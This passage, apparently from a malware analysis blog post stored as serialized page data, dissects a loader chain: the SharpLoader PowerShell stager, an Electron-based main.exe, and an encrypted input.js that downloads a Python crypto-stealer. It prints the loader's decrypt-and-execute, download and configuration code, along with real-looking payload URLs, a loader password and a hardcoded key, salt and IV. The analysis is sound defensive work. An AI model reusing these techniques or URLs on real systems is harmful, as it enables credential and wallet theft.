",[63,6465,6466],{},".NET"," assembly’s ",[63,6469,6470],{},"Main()"," method via reflection.",[1258,6473,6474,6477],{},[63,6475,6476],{},"-noArgs",": Triggers execution without passing any parameters to the second-stage payload.",[12,6479,6480],{},"Internally, the arguments are collected and forwarded like this:",[56,6482,6484],{"className":5687,"code":6483,"language":5689,"meta":65,"style":65},"object[] cmd = args.Skip(2).ToArray();\na.EntryPoint.Invoke(null, new object[] { cmd });\n",[63,6485,6486,6491],{"__ignoreMap":65},[102,6487,6488],{"class":104,"line":105},[102,6489,6490],{},"object[] cmd = args.Skip(2).ToArray();\n",[102,6492,6493],{"class":104,"line":111},[102,6494,6495],{},"a.EntryPoint.Invoke(null, new object[] { cmd });\n",[12,6497,6498],{},"This means that the .NET payload is expected to have a signature like:",[56,6500,6502],{"className":6057,"code":6501,"language":6059,"meta":65,"style":65},"static void Main(string[] args)\n",[63,6503,6504],{"__ignoreMap":65},[102,6505,6506],{"class":104,"line":105},[102,6507,6501],{},[12,6509,6510,6511,6513],{},"or it will gracefully fall back to the parameterless ",[63,6512,6470],{}," variant via fallback logic. This behavior allows red teams or malware authors to create multi-purpose second stages that can perform different operations depending on the input — for example, launching an implant, collecting system info, or initiating C2 communication.",[12,6515,6516],{},"Such modularity and configurability are key features of advanced malware frameworks, and they illustrate how script-based loaders can behave as highly adaptive execution environments for downstream payloads.",[41,6518,6520],{"id":6519},"_46-real-world-usage-example","4.6 Real-World Usage Example",[12,6522,47],{},[12,6524,6525],{},"To illustrate SharpLoader’s real-world execution in an actual campaign, consider the following invocation seen in the wild:",[56,6527,6529],{"className":5687,"code":6528,"language":5689,"meta":65,"style":65},"Invoke-SharpLoader -location \"https://cosmoplwnets.xyz/.well-known/pki-validation/calc.enc\" -password UwUFufu1 -noArgs\n",[63,6530,6531],{"__ignoreMap":65},[102,6532,6533],{"class":104,"line":105},[102,6534,6528],{},[12,6536,6537],{},"This example highlights the typical use case of SharpLoader:",[1255,6539,6540,6554,6566,6576],{},[1258,6541,6542,6545,6546,6549,6550,6553],{},[251,6543,6544],{},"Location Argument",": The URL points to a remote server hosting ",[63,6547,6548],{},"calc.enc",", a concealed second-stage payload. The endpoint is located under a legitimate-looking ",[63,6551,6552],{},".well-known"," directory, often used for HTTPS certificate validation, which helps blend the URL into legitimate web traffic.",[1258,6555,6556,1062,6559,6561,6562,6565],{},[251,6557,6558],{},"Payload Characteristics",[63,6560,6548],{}," is a ",[251,6563,6564],{},"triple-obfuscated file"," — Base64-encoded, GZip-compressed, and AES-encrypted. This obfuscation pipeline ensures the payload is opaque to most detection mechanisms unless fully executed and decrypted in memory.",[1258,6567,6568,6571,6572,6575],{},[251,6569,6570],{},"Password Argument",": The string ",[63,6573,6574],{},"UwUFufu1"," is used at runtime to derive the AES key via SHA-256 and PBKDF2. Without this password, the payload cannot be decrypted, making offline analysis without context nearly impossible.",[1258,6577,6578,6581,6582,6584],{},[251,6579,6580],{},"No Additional Arguments",": The ",[63,6583,6476],{}," switch indicates that no command-line parameters are passed to the decrypted .NET assembly, triggering its default execution path.",[12,6586,6587,6588,6591],{},"This stealthy invocation chain encapsulates SharpLoader’s core purpose: ",[251,6589,6590],{},"fileless, adaptive, and secure payload delivery"," through simple PowerShell syntax with maximum obfuscation and evasion.",[41,6593,6595],{"id":6594},"_47-summary","4.7 Summary",[12,6597,47],{},[12,6599,6600,6601,6603],{},"The ",[63,6602,5898],{}," construct exemplifies a highly refined and evasive malware staging technique that leverages native system components, reflection, and cryptography to operate almost entirely in-memory.",[12,6605,6606],{},[251,6607,6608],{},"Key Highlights:",[1255,6610,6611,6620,6626,6632],{},[1258,6612,6613,6616,6617,6619],{},[251,6614,6615],{},"Bypassing AMSI",": Direct in-memory patching of ",[63,6618,6038],{}," disables antivirus inspection without invoking detectable APIs.",[1258,6621,6622,6625],{},[251,6623,6624],{},"Secure Payload Handling",": Retrieval of encrypted and compressed stage-two payloads ensures confidentiality and adds multiple layers of evasion.",[1258,6627,6628,6631],{},[251,6629,6630],{},"Memory-Only Execution",": Decrypted payloads are never written to disk, making detection by traditional file-based scanners nearly impossible.",[1258,6633,6634,6637],{},[251,6635,6636],{},"Modular and Reusable Architecture",": Through PowerShell parameters, SharpLoader can be flexibly reused across campaigns with varying payloads and runtime behaviors.",[25,6639,6641,6642,6644],{"id":6640},"_5-deep-dive-mainexe-electron-based-malware-loader","5. Deep Dive: ",[63,6643,4618],{}," – Electron-Based Malware Loader",[12,6646,31],{},[12,6648,6649,6650,6652,6653,6656,6657,6659,6660,6662],{},"During reverse engineering, it became clear that ",[63,6651,4618],{},", flagged by Microsoft Defender for Endpoint, was not a conventional binary but an ",[251,6654,6655],{},"Electron-based malware loader",". It was delivered inside an archive named ",[63,6658,5831],{},", which ",[63,6661,4614],{}," downloaded and extracted at runtime. Once unpacked, the structure and contents strongly resembled a typical Electron application.",[41,6664,6666],{"id":6665},"_51-recognizing-electron-structure","5.1 Recognizing Electron Structure",[12,6668,47],{},[12,6670,6671],{},"The extracted folder included files such as:",[1255,6673,6674,6685,6693,6699],{},[1258,6675,6676,805,6679,805,6682],{},[63,6677,6678],{},"chrome_100_percent.pak",[63,6680,6681],{},"v8_context_snapshot.bin",[63,6683,6684],{},"d3dcompiler_47.dll",[1258,6686,6687,4598,6690],{},[63,6688,6689],{},"LICENSES.chromium",[63,6691,6692],{},"LICENSES.electron",[1258,6694,6695,6696,6698],{},"A large ",[63,6697,4618],{}," binary (~150 MB)",[1258,6700,6701,6702,6704,6705,6707,6708],{},"A ",[63,6703,5841],{}," folder containing ",[63,6706,5068],{}," and a secondary binary ",[63,6709,6710],{},"elevate.exe",[12,6712,6713],{},[2772,6714],{"alt":6715,"src":6716},"Packaged Windows 64-bit version of the desktop app","https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png",[12,6718,6719,6720,6722],{},"These are all strong indicators of an Electron app, which uses Chromium and Node.js to package JavaScript-based desktop applications. The presence of ",[63,6721,6710],{},", a signed Microsoft binary often used to escalate privileges, raised further suspicion—it could be abused to launch child processes with elevated rights.",[41,6724,6726],{"id":6725},"_52-unpacking-and-static-analysis-deep-dive","5.2 Unpacking and Static Analysis (Deep Dive)",[12,6728,47],{},[12,6730,6731,6732,6734,6735,6737,6738,6740,6741,6743,6744,6747],{},"Rather than executing ",[63,6733,4618],{},", I opted for a static analysis approach to avoid triggering any live behavior. My initial suspicion that ",[63,6736,4618],{}," was built with Electron was confirmed by locating the ",[63,6739,5068],{}," file inside the ",[63,6742,5841],{}," directory. In Electron apps, this archive contains all core application logic, such as JavaScript files, configuration (",[63,6745,6746],{},"package.json","), and assets, packed into a custom format for performance and obfuscation purposes.",[12,6749,6600,6750,6753,6754,6757],{},[63,6751,6752],{},".asar"," archive is essentially a read-only, high-performance container similar to ",[63,6755,6756],{},".zip",", but optimized for Electron’s runtime. While not encrypted, it obfuscates code access, making static analysis more challenging unless unpacked.",[12,6759,6760,6761,6764],{},"To unpack it, I used the official ",[63,6762,6763],{},"asar"," tool provided via npm. The steps were:",[56,6766,6768],{"className":262,"code":6767,"language":264,"meta":65,"style":65},"npm install -g asar\nasar extract app.asar extracted_app\n",[63,6769,6770,6784],{"__ignoreMap":65},[102,6771,6772,6775,6778,6781],{"class":104,"line":105},[102,6773,6774],{"class":271},"npm",[102,6776,6777],{"class":289}," install",[102,6779,6780],{"class":275}," -g",[102,6782,6783],{"class":289}," asar\n",[102,6785,6786,6788,6791,6794],{"class":104,"line":111},[102,6787,6763],{"class":271},[102,6789,6790],{"class":289}," extract",[102,6792,6793],{"class":289}," app.asar",[102,6795,6796],{"class":289}," extracted_app\n",[12,6798,6799,6800,6803],{},"Running the above commands extracted the content into a working folder (",[63,6801,6802],{},"extracted_app/","), which revealed the actual JavaScript application code. This included:",[1255,6805,6806,6827,6835],{},[1258,6807,6808,805,6811,805,6814,6817,6818,6820,6821,6823,6824,6826],{},[63,6809,6810],{},"jscryter.js",[63,6812,6813],{},"input.js",[63,6815,6816],{},"obf.js",": These scripts form the malware logic. ",[63,6819,6810],{}," appears to orchestrate payload delivery, ",[63,6822,6813],{}," defines configuration constants or command logic, and ",[63,6825,6816],{}," is a heavily obfuscated script likely containing the core payload logic.",[1258,6828,6829,805,6831,6834],{},[63,6830,6746],{},[63,6832,6833],{},"package-lock.json",": Define the runtime environment",[1258,6836,6837,6840,6841,805,6844,805,6847],{},[63,6838,6839],{},"node_modules/",": Contains all dependencies like ",[63,6842,6843],{},"axios",[63,6845,6846],{},"adm-zip",[63,6848,6849],{},"child_process",[12,6851,6852,6853,6855,6856,1014],{},"The unpacked contents enabled complete visibility into the logic of the malware without requiring execution, which was essential for safe reverse engineering. This step confirmed that ",[63,6854,4618],{}," served purely as a runtime wrapper for the malicious scripts hidden inside ",[63,6857,5068],{},[41,6859,6861],{"id":6860},"_53-what-the-static-analysis-revealed","5.3. What the Static Analysis Revealed",[12,6863,47],{},[12,6865,6866],{},"By manually inspecting the code, I confirmed the malware logic was fully JavaScript-based, executed within the Electron runtime. The scripts were designed to:",[1255,6868,6869,6876,6881,6884],{},[1258,6870,6871,6872,6875],{},"Download an encrypted payload (",[63,6873,6874],{},"pyth.zip",") from fallback URLs",[1258,6877,6878,6879],{},"Extract the archive using ",[63,6880,6846],{},[1258,6882,6883],{},"Perform string replacement to inject specific credentials or wallet addresses",[1258,6885,6886,6887,6889,6890,4598,6893],{},"Launch the resulting Python file (",[63,6888,4622],{},") via ",[63,6891,6892],{},"child_process.exec()",[63,6894,4593],{},[12,6896,6897,6898,6904],{},"Crucially, the loader also included logic to ",[251,6899,6900,6901,6903],{},"copy ",[63,6902,4614],{}," into the user's AppData directory"," if it wasn't already present—reinforcing persistence and maintaining the infection loop.",[25,6906,6908,6909,6911],{"id":6907},"_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","6. Deep Dive: ",[63,6910,6813],{}," – The Encrypted JavaScript Payload Loader",[12,6913,31],{},[12,6915,6916,6918],{},[63,6917,6813],{}," is a critical component in the analyzed malware chain, functioning as the decryption and execution hub for an encrypted JavaScript payload. This script hides its core functionality behind a strong encryption layer and only reveals its behavior during runtime.",[41,6920,6922],{"id":6921},"_61-encryption-and-decryption-mechanics","6.1 Encryption and Decryption Mechanics",[12,6924,47],{},[12,6926,6927,6928,6930],{},"At first glance, ",[63,6929,6813],{}," contains very little readable code. However, its primary purpose is to decrypt and execute a large obfuscated JavaScript blob stored within the script itself.",[186,6932,6934],{"id":6933},"_611-decryption-logic","6.1.1 Decryption Logic",[12,6936,192],{},[12,6938,6939,6940,6943],{},"The script defines a ",[63,6941,6942],{},"decrypt()"," function that accepts four parameters:",[1255,6945,6946,6952,6958,6964],{},[1258,6947,6948,6951],{},[63,6949,6950],{},"encdata",": The encrypted Base64-encoded data",[1258,6953,6954,6957],{},[63,6955,6956],{},"masterkey",": A plaintext passphrase",[1258,6959,6960,6963],{},[63,6961,6962],{},"salt",": A cryptographic salt (Base64)",[1258,6965,6966,6969],{},[63,6967,6968],{},"iv",": The initialization vector for AES decryption (Base64)",[12,6971,6972,6973,6976],{},"The decryption process is implemented using Node.js’s built-in ",[63,6974,6975],{},"crypto"," module. It proceeds as follows:",[6086,6978,6979,7086,7198],{},[1258,6980,6981,6984,6985,7060],{},[251,6982,6983],{},"Key Derivation:","\nThe script derives a 256-bit symmetric key using PBKDF2 (Password-Based Key Derivation Function 2):",[56,6986,6990],{"className":6987,"code":6988,"language":6989,"meta":65,"style":65},"language-js shiki shiki-themes github-light github-dark","const key = crypto.pbkdf2Sync(\n masterkey,\n Buffer.from(salt, \"base64\"),\n 100000,\n 32,\n \"sha512\",\n);\n","js",[63,6991,6992,7012,7017,7034,7042,7049,7056],{"__ignoreMap":65},[102,6993,6994,6997,7000,7003,7006,7009],{"class":104,"line":105},[102,6995,6996],{"class":285},"const",[102,6998,6999],{"class":275}," key",[102,7001,7002],{"class":285}," =",[102,7004,7005],{"class":293}," crypto.",[102,7007,7008],{"class":271},"pbkdf2Sync",[102,7010,7011],{"class":293},"(\n",[102,7013,7014],{"class":104,"line":111},[102,7015,7016],{"class":293}," masterkey,\n",[102,7018,7019,7022,7025,7028,7031],{"class":104,"line":329},[102,7020,7021],{"class":293}," Buffer.",[102,7023,7024],{"class":271},"from",[102,7026,7027],{"class":293},"(salt, ",[102,7029,7030],{"class":289},"\"base64\"",[102,7032,7033],{"class":293},"),\n",[102,7035,7036,7039],{"class":104,"line":346},[102,7037,7038],{"class":275}," 100000",[102,7040,7041],{"class":293},",\n",[102,7043,7044,7047],{"class":104,"line":650},[102,7045,7046],{"class":275}," 32",[102,7048,7041],{"class":293},[102,7050,7051,7054],{"class":104,"line":656},[102,7052,7053],{"class":289}," \"sha512\"",[102,7055,7041],{"class":293},[102,7057,7058],{"class":104,"line":662},[102,7059,825],{"class":293},[1255,7061,7062,7068,7074,7080],{},[1258,7063,7064,7067],{},[251,7065,7066],{},"Hash function:"," SHA-512",[1258,7069,7070,7073],{},[251,7071,7072],{},"Iterations:"," 100,000",[1258,7075,7076,7079],{},[251,7077,7078],{},"Key length:"," 32 bytes (256 bits)",[1258,7081,7082,7085],{},[251,7083,7084],{},"Salt:"," Supplied as a Base64-decoded input",[1258,7087,7088,7091,7092,7142,7144,7145],{},[251,7089,7090],{},"AES-256-CBC Decryption:","\nThe derived key is then used to create an AES decipher object:",[56,7093,7095],{"className":6987,"code":7094,"language":6989,"meta":65,"style":65},"const decipher = crypto.createDecipheriv(\n \"aes-256-cbc\",\n key,\n Buffer.from(iv, \"base64\"),\n);\n",[63,7096,7097,7113,7120,7125,7138],{"__ignoreMap":65},[102,7098,7099,7101,7104,7106,7108,7111],{"class":104,"line":105},[102,7100,6996],{"class":285},[102,7102,7103],{"class":275}," decipher",[102,7105,7002],{"class":285},[102,7107,7005],{"class":293},[102,7109,7110],{"class":271},"createDecipheriv",[102,7112,7011],{"class":293},[102,7114,7115,7118],{"class":104,"line":111},[102,7116,7117],{"class":289}," \"aes-256-cbc\"",[102,7119,7041],{"class":293},[102,7121,7122],{"class":104,"line":329},[102,7123,7124],{"class":293}," key,\n",[102,7126,7127,7129,7131,7134,7136],{"class":104,"line":346},[102,7128,7021],{"class":293},[102,7130,7024],{"class":271},[102,7132,7133],{"class":293},"(iv, ",[102,7135,7030],{"class":289},[102,7137,7033],{"class":293},[102,7139,7140],{"class":104,"line":650},[102,7141,825],{"class":293},[531,7143],{},"The encrypted payload is decrypted using standard CBC (Cipher Block Chaining) mode:",[56,7146,7148],{"className":6987,"code":7147,"language":6989,"meta":65,"style":65},"let decrypted = decipher.update(encdata, \"base64\", \"utf8\");\ndecrypted += decipher.final(\"utf8\");\n",[63,7149,7150,7179],{"__ignoreMap":65},[102,7151,7152,7155,7158,7161,7164,7167,7170,7172,7174,7177],{"class":104,"line":105},[102,7153,7154],{"class":285},"let",[102,7156,7157],{"class":293}," decrypted ",[102,7159,7160],{"class":285},"=",[102,7162,7163],{"class":293}," decipher.",[102,7165,7166],{"class":271},"update",[102,7168,7169],{"class":293},"(encdata, ",[102,7171,7030],{"class":289},[102,7173,805],{"class":293},[102,7175,7176],{"class":289},"\"utf8\"",[102,7178,825],{"class":293},[102,7180,7181,7184,7187,7189,7192,7194,7196],{"class":104,"line":111},[102,7182,7183],{"class":293},"decrypted ",[102,7185,7186],{"class":285},"+=",[102,7188,7163],{"class":293},[102,7190,7191],{"class":271},"final",[102,7193,545],{"class":293},[102,7195,7176],{"class":289},[102,7197,825],{"class":293},[1258,7199,7200,7203,7204,7207,7208,7229,7231],{},[251,7201,7202],{},"Dynamic Execution:","\nThe decrypted JavaScript code is never written to disk. Instead, it is dynamically executed in memory using the ",[63,7205,7206],{},"Function"," constructor:",[56,7209,7211],{"className":6987,"code":7210,"language":6989,"meta":65,"style":65},"new Function(\"require\", decrypted)(require);\n",[63,7212,7213],{"__ignoreMap":65},[102,7214,7215,7218,7221,7223,7226],{"class":104,"line":105},[102,7216,7217],{"class":285},"new",[102,7219,7220],{"class":271}," Function",[102,7222,545],{"class":293},[102,7224,7225],{"class":289},"\"require\"",[102,7227,7228],{"class":293},", decrypted)(require);\n",[531,7230],{},"This technique enables fileless execution, reducing the chance of detection by traditional antivirus engines that rely on disk-based scanning.",[12,7233,7234],{},"This approach demonstrates a layered defense against reverse engineering by combining key derivation, strong encryption, and dynamic in-memory execution.",[12,7236,7237],{},[251,7238,7239],{},"Key Material and Encrypted Data",[12,7241,7242],{},"The script includes the following hardcoded inputs:",[1255,7244,7245,7251,7259,7267],{},[1258,7246,7247,7250],{},[251,7248,7249],{},"Encrypted Data:"," A massive Base64-encoded blob",[1258,7252,7253,540,7256],{},[251,7254,7255],{},"Master Key:",[63,7257,7258],{},"9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs",[1258,7260,7261,540,7263,7266],{},[251,7262,7084],{},[63,7264,7265],{},"maXtklzMEZRY9dbul/XPSw=="," (Base64-encoded)",[1258,7268,7269,540,7272,7266],{},[251,7270,7271],{},"IV:",[63,7273,7274],{},"HwK6sOz7FBbL+YsrOxtYUg==",[12,7276,7277,7278,1014],{},"These are all embedded directly in the source code of ",[63,7279,6813],{},[41,7281,7283],{"id":7282},"_62-post-decryption-payload-behavior","6.2 Post-Decryption Payload Behavior",[12,7285,47],{},[12,7287,7288],{},"Once decrypted, the embedded payload becomes a full JavaScript program that performs the following malicious actions:",[186,7290,7292],{"id":7291},"_621-environment-preparation","6.2.1 Environment Preparation",[12,7294,192],{},[12,7296,7297],{},"The decrypted payload begins by setting up its execution environment using built-in Node.js modules. This setup phase ensures that all required paths and working directories are clearly defined before any malicious behavior occurs.",[1255,7299,7300,7333],{},[1258,7301,7302,7305,7306,7309,7310],{},[251,7303,7304],{},"Temporary Directory Resolution:","\nThe malware calls ",[63,7307,7308],{},"os.tmpdir()"," to determine the path to the current system's temporary directory. This is a common tactic for malware as temporary folders are typically writable and less scrutinized by endpoint protection systems.",[56,7311,7313],{"className":6987,"code":7312,"language":6989,"meta":65,"style":65},"const tempDir = os.tmpdir();\n",[63,7314,7315],{"__ignoreMap":65},[102,7316,7317,7319,7322,7324,7327,7330],{"class":104,"line":105},[102,7318,6996],{"class":285},[102,7320,7321],{"class":275}," tempDir",[102,7323,7002],{"class":285},[102,7325,7326],{"class":293}," os.",[102,7328,7329],{"class":271},"tmpdir",[102,7331,7332],{"class":293},"();\n",[1258,7334,7335,7338,7339,7352],{},[251,7336,7337],{},"Path Construction:","\nThe script then constructs absolute paths for two important files:",[1255,7340,7341,7346],{},[1258,7342,7343,7345],{},[63,7344,6874],{},": The archive that contains the actual second-stage Python-based stealer",[1258,7347,7348,7351],{},[63,7349,7350],{},"bnd.exe",": An optional executable file that may serve as a persistence backdoor or additional payload",[56,7353,7355],{"className":6987,"code":7354,"language":6989,"meta":65,"style":65},"const tempFile = path.join(tempDir, \"pyth.zip\");\nconst binderFile = path.join(tempDir, \"bnd.exe\");\n",[63,7356,7357,7380],{"__ignoreMap":65},[102,7358,7359,7361,7364,7366,7369,7372,7375,7378],{"class":104,"line":105},[102,7360,6996],{"class":285},[102,7362,7363],{"class":275}," tempFile",[102,7365,7002],{"class":285},[102,7367,7368],{"class":293}," path.",[102,7370,7371],{"class":271},"join",[102,7373,7374],{"class":293},"(tempDir, ",[102,7376,7377],{"class":289},"\"pyth.zip\"",[102,7379,825],{"class":293},[102,7381,7382,7384,7387,7389,7391,7393,7395,7398],{"class":104,"line":111},[102,7383,6996],{"class":285},[102,7385,7386],{"class":275}," binderFile",[102,7388,7002],{"class":285},[102,7390,7368],{"class":293},[102,7392,7371],{"class":271},[102,7394,7374],{"class":293},[102,7396,7397],{"class":289},"\"bnd.exe\"",[102,7399,825],{"class":293},[12,7401,7402],{},"This path setup abstracts away OS-specific path syntax and enables the malware to operate seamlessly on any Windows system. It also sets the stage for the file download and unpacking mechanisms that follow.",[186,7404,7406],{"id":7405},"_622-payload-download-with-fallback-strategy","6.2.2 Payload Download with Fallback Strategy",[12,7408,192],{},[12,7410,7411],{},"The second major phase of the decrypted JavaScript payload involves downloading a malicious ZIP archive from remote sources. This mechanism is designed with a multi-tiered fallback strategy to increase resilience and availability.",[1255,7413,7414,7445,7530,7564],{},[1258,7415,7416,7419,7420,7439,7441,7442,7444],{},[251,7417,7418],{},"Primary Link Resolution via Rentry.co","\nThe script begins by resolving a dynamic URL from a text paste service. It sends a GET request to:",[56,7421,7423],{"className":6987,"code":7422,"language":6989,"meta":65,"style":65},"const url = \"https://rentry.co/7vzd22fg36hfdd33/raw\";\n",[63,7424,7425],{"__ignoreMap":65},[102,7426,7427,7429,7432,7434,7437],{"class":104,"line":105},[102,7428,6996],{"class":285},[102,7430,7431],{"class":275}," url",[102,7433,7002],{"class":285},[102,7435,7436],{"class":289}," \"https://rentry.co/7vzd22fg36hfdd33/raw\"",[102,7438,1365],{"class":293},[531,7440],{},"This returns a plain-text URL string pointing to the actual location of the ",[63,7443,6874],{}," archive. Using a redirection mechanism like this is a common obfuscation technique—it abstracts the real malicious URL and makes static detection harder.",[1258,7446,7447,7450,7451,7483,7485,7486,7488,7489,7523,7525,7526,7529],{},[251,7448,7449],{},"Download Execution","\nThe resolved URL is then requested using the Axios library with a response stream:",[56,7452,7454],{"className":6987,"code":7453,"language":6989,"meta":65,"style":65},"const fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\n",[63,7455,7456],{"__ignoreMap":65},[102,7457,7458,7460,7463,7465,7468,7471,7474,7477,7480],{"class":104,"line":105},[102,7459,6996],{"class":285},[102,7461,7462],{"class":275}," fileResponse",[102,7464,7002],{"class":285},[102,7466,7467],{"class":285}," await",[102,7469,7470],{"class":293}," axios.",[102,7472,7473],{"class":271},"get",[102,7475,7476],{"class":293},"(fileUrl, { responseType: ",[102,7478,7479],{"class":289},"\"stream\"",[102,7481,7482],{"class":293}," });\n",[531,7484],{},"The file is written to disk as ",[63,7487,6874],{}," in the system's temp directory:",[56,7490,7492],{"className":6987,"code":7491,"language":6989,"meta":65,"style":65},"const writer = fs.createWriteStream(tempFile);\nfileResponse.data.pipe(writer);\n",[63,7493,7494,7512],{"__ignoreMap":65},[102,7495,7496,7498,7501,7503,7506,7509],{"class":104,"line":105},[102,7497,6996],{"class":285},[102,7499,7500],{"class":275}," writer",[102,7502,7002],{"class":285},[102,7504,7505],{"class":293}," fs.",[102,7507,7508],{"class":271},"createWriteStream",[102,7510,7511],{"class":293},"(tempFile);\n",[102,7513,7514,7517,7520],{"class":104,"line":111},[102,7515,7516],{"class":293},"fileResponse.data.",[102,7518,7519],{"class":271},"pipe",[102,7521,7522],{"class":293},"(writer);\n",[531,7524],{},"This download is wrapped in a ",[63,7527,7528],{},"Promise"," to ensure synchronous completion before further logic is executed.",[1258,7531,7532,7535,7536,7561,7563],{},[251,7533,7534],{},"Fallback URLs","\nIf the Rentry-based link fails, the script attempts hardcoded backup locations:",[56,7537,7539],{"className":6987,"code":7538,"language":6989,"meta":65,"style":65},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip\nhttps://cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[63,7540,7541,7552],{"__ignoreMap":65},[102,7542,7543,7546,7548],{"class":104,"line":105},[102,7544,7545],{"class":271},"https",[102,7547,1551],{"class":293},[102,7549,7551],{"class":7550},"sJ8bj","//cosmicdust.zip/.well-known/pki-validation/pyth.zip\n",[102,7553,7554,7556,7558],{"class":104,"line":111},[102,7555,7545],{"class":271},[102,7557,1551],{"class":293},[102,7559,7560],{"class":7550},"//cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[531,7562],{},"These domains are structured to appear as part of standard TLS validation folders, possibly mimicking Let's Encrypt or domain validation paths to reduce suspicion. Each fallback is retried with the same streaming and file-write logic.",[1258,7565,7566,7569,7570,7573],{},[251,7567,7568],{},"Robustness and Obfuscation","\nThis fallback mechanism ensures that the malware has multiple retrieval paths for its second-stage payload. The use of a dynamic pointer (",[63,7571,7572],{},"rentry.co",") and multiple failover mirrors makes the malware more resilient to takedowns, blocking, and DNS sinkholes.",[12,7575,7576],{},"This phase demonstrates careful operational planning by the malware authors, using layered redundancy and well-camouflaged delivery infrastructure.",[1255,7578,7579,7585],{},[1258,7580,7581,7582,7584],{},"Downloads ",[63,7583,6874],{}," from the resolved URL",[1258,7586,7587,7588],{},"If that fails, it attempts fallback mirrors:\n",[1255,7589,7590,7595],{},[1258,7591,7592],{},[63,7593,7594],{},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip",[1258,7596,7597],{},[63,7598,7599],{},"https://cosmoplanets.net/well-known/pki-validation/pyth.zip",[186,7601,7603],{"id":7602},"_623-payload-extraction-and-manipulation","6.2.3 Payload Extraction and Manipulation",[12,7605,192],{},[12,7607,7608,7609,7611,7612,7614],{},"Once the ",[63,7610,6874],{}," archive has been successfully downloaded and saved to disk, the malware proceeds to extract its contents and prepare them for execution. This is accomplished using the ",[63,7613,6846],{}," Node.js library, which allows programmatic handling of ZIP files.",[1255,7616,7617,7665,7692],{},[1258,7618,7619,7622,7659,7661,7662,7664],{},[251,7620,7621],{},"ZIP Extraction:",[56,7623,7625],{"className":6987,"code":7624,"language":6989,"meta":65,"style":65},"const zip = new AdmZip(tempFile);\nzip.extractAllTo(tempDir, true);\n",[63,7626,7627,7644],{"__ignoreMap":65},[102,7628,7629,7631,7634,7636,7639,7642],{"class":104,"line":105},[102,7630,6996],{"class":285},[102,7632,7633],{"class":275}," zip",[102,7635,7002],{"class":285},[102,7637,7638],{"class":285}," new",[102,7640,7641],{"class":271}," AdmZip",[102,7643,7511],{"class":293},[102,7645,7646,7649,7652,7654,7657],{"class":104,"line":111},[102,7647,7648],{"class":293},"zip.",[102,7650,7651],{"class":271},"extractAllTo",[102,7653,7374],{"class":293},[102,7655,7656],{"class":275},"true",[102,7658,825],{"class":293},[531,7660],{},"This extracts all contents of the archive to the system's temporary directory. The ",[63,7663,7656],{}," flag ensures overwriting of any existing files.",[1258,7666,7667,7670,7671,7673,7674],{},[251,7668,7669],{},"Archive Contents:","\nThe archive ",[63,7672,6874],{}," includes a fully bundled Python project, including:",[1255,7675,7676,7679,7682],{},[1258,7677,7678],{},"A directory structure resembling a legitimate Python package",[1258,7680,7681],{},"Several Python modules and dependencies",[1258,7683,7684,7685,7687,7688,7691],{},"The key file ",[63,7686,4622],{}," located at ",[63,7689,7690],{},"Crypto/Util/astor.py",", which is the main stealer payload",[1258,7693,7694,7697,7698,7700,7701,7721],{},[251,7695,7696],{},"Placeholder Replacement:","\nThe malware performs dynamic substitution of predefined placeholders within ",[63,7699,4622],{}," to inject attacker-controlled configuration data such as:",[1255,7702,7703,7706,7709,7715],{},[1258,7704,7705],{},"A Discord webhook URL",[1258,7707,7708],{},"Cryptocurrency wallet addresses (BTC, ETH, DOGE, LTC, XMR, etc.)",[1258,7710,7711,7712,1289],{},"A user identifier (",[63,7713,7714],{},"%USERID%",[1258,7716,7717,7718,1289],{},"An error status flag (",[63,7719,7720],{},"%ERRORSTATUS%",[56,7722,7724],{"className":6987,"code":7723,"language":6989,"meta":65,"style":65},"fs.readFile(extractedDir + \"\\Crypto\\Util\\astor.py\", 'utf8', (err, data) => {\n let updatedFile = data\n .replace(\"%DISCORD%\", \u003Cwebhook>)\n .replace(\"%ADDRESSBTC%\", \u003Cbtc_address>)\n ...\n .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n\n fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n});\n",[63,7725,7726,7786,7799,7822,7832,7837,7842,7847,7852],{"__ignoreMap":65},[102,7727,7728,7731,7734,7737,7739,7742,7745,7748,7751,7754,7757,7760,7762,7765,7768,7772,7774,7777,7780,7783],{"class":104,"line":105},[102,7729,7730],{"class":293},"fs.",[102,7732,7733],{"class":271},"readFile",[102,7735,7736],{"class":293},"(extractedDir ",[102,7738,1295],{"class":285},[102,7740,7741],{"class":289}," \"",[102,7743,7744],{"class":275},"\\C",[102,7746,7747],{"class":289},"rypto",[102,7749,7750],{"class":275},"\\U",[102,7752,7753],{"class":289},"til",[102,7755,7756],{"class":275},"\\a",[102,7758,7759],{"class":289},"stor.py\"",[102,7761,805],{"class":293},[102,7763,7764],{"class":289},"'utf8'",[102,7766,7767],{"class":293},", (",[102,7769,7771],{"class":7770},"s4XuR","err",[102,7773,805],{"class":293},[102,7775,7776],{"class":7770},"data",[102,7778,7779],{"class":293},") ",[102,7781,7782],{"class":285},"=>",[102,7784,7785],{"class":293}," {\n",[102,7787,7788,7791,7794,7796],{"class":104,"line":111},[102,7789,7790],{"class":285}," let",[102,7792,7793],{"class":293}," updatedFile ",[102,7795,7160],{"class":285},[102,7797,7798],{"class":293}," data\n",[102,7800,7801,7804,7807,7809,7812,7815,7819],{"class":104,"line":329},[102,7802,7803],{"class":293}," .",[102,7805,7806],{"class":271},"replace",[102,7808,545],{"class":293},[102,7810,7811],{"class":289},"\"%DISCORD%\"",[102,7813,7814],{"class":293},", \u003C",[102,7816,7818],{"class":7817},"s9eBZ","webhook",[102,7820,7821],{"class":293},">)\n",[102,7823,7824,7827,7830],{"class":104,"line":346},[102,7825,7826],{"class":293}," .replace(\"%ADDRESSBTC%\", \u003C",[102,7828,7829],{"class":275},"btc_address",[102,7831,7821],{"class":293},[102,7833,7834],{"class":104,"line":650},[102,7835,7836],{"class":293}," ...\n",[102,7838,7839],{"class":104,"line":656},[102,7840,7841],{"class":293}," .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n",[102,7843,7844],{"class":104,"line":662},[102,7845,7846],{"emptyLinePlaceholder":2180},"\n",[102,7848,7849],{"class":104,"line":668},[102,7850,7851],{"class":293}," 